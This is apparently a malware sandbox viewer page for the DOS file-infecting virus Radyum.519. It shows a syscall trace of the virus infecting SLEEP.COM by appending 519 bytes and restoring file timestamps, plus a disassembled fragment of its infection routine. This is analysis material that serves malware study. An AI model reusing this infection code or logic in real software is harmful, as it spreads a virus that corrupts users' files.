Sample viewer

vx.netlux.org/Virus.DOS.Radyum.519

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:46:48.509162065Z 44 PC: 12cbc | Get time 0x12cbc: mov word ptr [bp + 0x111], dx
0x12cc0: mov ah, 0x1a
0x12cc2: lea dx, word ptr [bp + 0x316]
0x12cc6: int 0x21
0x12cc8: mov ah, 0x4e
0x12cca: mov cx, 3
0x12ccd: lea dx, word ptr [bp + 0x2fc]
0x12cd1: int 0x21
0x12cd3: jae 0x12cd8
0x12cd5: jmp 0x12da2
0x12cd8: mov ax, word ptr [bp + 0x32c]
0x12cdc: mov word ptr [bp + 0x342], ax
0x12ce0: mov ax, word ptr [bp + 0x32e]
0x12ce4: mov word ptr [bp + 0x344], ax
0x12ce8: mov ax, 0x4300
0x12ceb: lea dx, word ptr [bp + 0x334]
0x12cef: int 0x21
0x12cf1: mov byte ptr [bp + 0x341], cl
0x12cf5: cmp word ptr [bp + 0x334], 0x434f
0x12cfb: jne 0x12d11
2018-12-17T22:46:48.512511112Z 26 PC: 12cc8 | Set disk transfer address
2018-12-17T22:46:48.513785089Z 78 PC: 12cd3 | Find first file
2018-12-17T22:46:48.520369115Z 67 PC: 12cf1 | Get or set file attributes
2018-12-17T22:46:48.527240305Z 67 PC: 12d1c | Get or set file attributes
2018-12-17T22:46:48.545742765Z 61 PC: 12d25 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:48.555266254Z 63 PC: 12d36 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:46:48.562734284Z 66 PC: 12d4b | Move file pointer
2018-12-17T22:46:48.56484853Z 64 PC: 12ee3 | Write file or device (Write 519 bytes on handle 5)
2018-12-17T22:46:48.575101733Z 66 PC: 12d6b | Move file pointer
2018-12-17T22:46:48.576906359Z 64 PC: 12d76 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:46:48.584848131Z 87 PC: 12d86 | Get or set file date and time
2018-12-17T22:46:48.586803111Z 62 PC: 12d8a | Close file
2018-12-17T22:46:48.59568672Z 67 PC: 12d99 | Get or set file attributes
2018-12-17T22:46:48.60744397Z 26 PC: 12da9 | Set disk transfer address
2018-12-17T22:46:48.617123968Z 9 PC: 12a5f | Display string (Could not find end pointer)
2018-12-17T22:46:48.623859869Z 8 PC: 12a64 | Console input without echo